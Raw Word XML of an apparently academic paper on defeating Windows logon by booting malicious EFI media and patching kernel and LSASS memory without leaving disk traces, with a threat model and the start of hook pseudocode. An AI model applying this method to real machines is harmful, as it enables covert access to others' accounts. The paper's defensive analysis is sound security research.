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83C5" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="118" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="27" w:right="1615" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="29"/>
        </w:rPr>
        <w:t>Runtime Authentication Subversion via Ephemeral Kernel-Mode Patching: A Study of Physical Access Threats in Windows Operating Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B47EA1E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="22" w:right="673"/>
      </w:pPr>
      <w:r>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF6FB4F" w14:textId="7D8D2848" w:rsidR="00306CE1" w:rsidRDefault="00306CE1" w:rsidP="00306CE1">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The fundamental security principle "Physical access means system compromise" is becoming more and more applicable to the latest computing environments. The main content of this paper is a local technical investigation at the firmware and kernel levels of the Windows operating system aimed at understanding how the moment of transition from pre, boot to the runtime environment could be seized for an exploit.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This method is fundamentally different from the traditional disk, based password reset tool in that it only changes the volatile </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>memory,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hence, it is temporarily possible to bypass the multi, layer Windows authentication architecture without leaving any forensic traces on the persistent storage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The research paper explores the use of Full Disk Encryption and Virtualization, Based Security as the main line of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the commercial sector recovery tools. Besides, it relates them to the Windows security model.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>We, foremost, communicate that the software, to, hardware security boundary is highly asymmetric without the hardware support for the hardware, enforced encryption or isolation mechanisms: physical access to a system that is still on or has been recently turned off thus makes software incapable of providing a security layer of the required level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13635BFC" w14:textId="77777777" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="00306CE1">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C17CF47" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="341" w:right="673" w:hanging="329"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction: The Trust Model Inversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58778BEA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1.1 The Illusion of Software Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F87E4" w14:textId="5C4B5A26" w:rsidR="00FC7A97" w:rsidRDefault="00F91125">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91125">
        <w:t>In order to safeguard user credentials, isolate processes, and enforce privilege boundaries, modern operating systems build complex security architectures.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F91125">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="00F91125">
        <w:t>uses several security layers</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D27A6" w14:textId="577ACDAB" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">User-Mode Isolation: </w:t>
      </w:r>
      <w:r>
        <w:t>Each process operates in its own virtual address space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6BB7B" w14:textId="7900112D" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel-Mode Privilege Separation: </w:t>
      </w:r>
      <w:r>
        <w:t>Only the kernel can directly manipulate hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67835604" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Driver Signature Enforcement (DSE): </w:t>
      </w:r>
      <w:r>
        <w:t>All kernel drivers must be digitally signed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3487CCDE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kernel Patch Protection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:t>Critical kernel structures are periodically verified against tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CB2C53" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Code Integrity Measurement Architecture (CIMA): </w:t>
      </w:r>
      <w:r>
        <w:t>Prevents unsigned code execution in the kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642AC13" w14:textId="77777777" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Up until now, these safeguards have been realized through programs that operate on devices that the protector does not directly control. This creates a fundamental asymmetry: the protector side of the scenario presumes that the hardware is reliable, but the attacker who has physical access can without much effort substitute or reprogram that hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033407A2" w14:textId="77777777" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The IBM PC architecture, which was created in the early 1980s and is still the basis of modern x86/x64 systems, inherently has a significant design flaw: the firmware (UEFI/BIOS) is executed before the operating system and, thus, has complete access to the hardware. Therefore, a malicious bootloader can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A714CBE" w14:textId="5799E772" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="274"/>
        <w:ind w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Alter the kernel that is going to be loaded into the memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F4D3E" w14:textId="77777777" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="274"/>
        <w:ind w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Embed privileged code that essentially becomes the running system and is able to persist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24574FEE" w14:textId="77777777" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="274"/>
        <w:ind w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Bypass the security mechanisms at runtime and do any arbitrary operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF17083" w14:textId="77777777" w:rsidR="0006531B" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="274"/>
        <w:ind w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Establish a permanent Ring 0 environment for credential subversion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22B5FA" w14:textId="36102DAE" w:rsidR="00FC7A97" w:rsidRDefault="0006531B" w:rsidP="0006531B">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="12" w:right="1767" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r>
        <w:t>paper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sees that as a vulnerability single, physical, and tangible attack method that ultimately leads to the logical side of the compromise, hence the idea that physical access means logical access has to be there especially for hardware without encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABFDA7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1.2 Threat Model &amp; Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2ED498" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker Profile: </w:t>
      </w:r>
      <w:r>
        <w:t>- Physical access to the target system - Ability to boot from external media (USB, optical drive, or firmware manipulation) - No requirement for legitimate credentials - No requirement for user interaction after boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EBEC2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Target Systems: </w:t>
      </w:r>
      <w:r>
        <w:t>- Windows 7 through Windows 11 - Systems without Full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608F5EA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Disk Encryption (BitLocker) - Systems without Virtualization-Based Security (VBS) enabled - UEFI and legacy BIOS systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CED8E3" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Limitations: </w:t>
      </w:r>
      <w:r>
        <w:t>- Attack is volatile (cleared on reboot) - Attack fails if system drive is encrypted - Attack cannot access VBS/Credential Guard-protected memory - Attack requires ability to interrupt normal boot sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A637639" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Duration: </w:t>
      </w:r>
      <w:r>
        <w:t>- LSASS patching: &lt; 100ms - Persistence of patch: Until system reboot - Forensic visibility: Zero (all modifications occur in RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB48FD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1.3 Organization of This Paper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBFB68" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This paper progresses from architectural analysis to implementation detail to real-world deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18BB65" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Section 2: </w:t>
      </w:r>
      <w:r>
        <w:t>Detailed technical methodology covering each attack phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9D9DA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Section 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Assembly-level exploitation mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687309A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Section 4: </w:t>
      </w:r>
      <w:r>
        <w:t>Commercial implementations and forensic evidence from tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B604476" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Section 5: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mechanisms and their limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BAC5A5" w14:textId="0811085D" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="68"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6: </w:t>
      </w:r>
      <w:r>
        <w:t>Synthesis and implications for system security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4620F353" w14:textId="77777777" w:rsidR="00AD5226" w:rsidRDefault="00AD5226" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="0" w:right="1767" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563D33FD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="332" w:right="673" w:hanging="320"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Architecture: The Four-Phase Attack Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05006414" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack is structured as a deliberately sequenced pipeline, where each phase enables the subsequent phase, and each phase exploits specific architectural assumptions in the Windows system. Understanding the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">why </w:t>
      </w:r>
      <w:r>
        <w:t>behind each phase reveals the fundamental security boundaries that physical access can breach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C0DB5" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2.1 Phase One: Bootloader Interception (Pre-OS Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876CCAC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.1 The Critical Vulnerability: Trust in the Boot Sequence </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The fundamental vulnerability exploited in this phase is simple: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">the system cannot verify the integrity of the bootloader without already running the bootloader. </w:t>
      </w:r>
      <w:r>
        <w:t>This is a logical paradox known as the “chicken-and-egg” problem in security. The solution attempted by UEFI Secure Boot is to store signing keys in firmware, but this protection fails when an attacker controls the firmware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209695F6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why this matters: </w:t>
      </w:r>
      <w:r>
        <w:t>Before the Windows Kernel (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ntoskrnl.exe</w:t>
      </w:r>
      <w:r>
        <w:t>) executes even a single instruction, the firmware has already executed millions of instructions with unrestricted hardware access. Whatever the firmware (or a malicious bootloader replacing it) writes into memory will be trusted by the kernel. This is not a bug—it is the unavoidable consequence of the boot sequence design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03D00A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.2 UEFI Exploitation: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ExitBootServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Hook </w:t>
      </w:r>
      <w:r>
        <w:t>On modern UEFI systems, the attack proceeds as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950E906" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 1: Boot Media Replacement </w:t>
      </w:r>
      <w:r>
        <w:t>The attacker creates bootable external media (USB or optical drive) containing a malicious EFI application. The system is booted from this media, giving control to attacker code before the hard drive is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40085968" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ExitBootServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Callback Hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5AB689" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The bootloader must register a callback function to execute during the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firmwareto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-OS transition. The Windows Boot Manager (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>bootmgr.efi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) itself uses this mechanism—legitimately—to perform final initialization before jumping to the kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021971C0" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Pseudocode: UEFI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>ExitBootServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D8D45" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">EFI_STATUS Status </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gBS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CreateEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F916496" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>EVT_SIGNAL_EXIT_BOOT_SERVICES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Event triggered on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>ExitBootServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67CCBB23" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1229"/>
          <w:tab w:val="center" w:pos="4786"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
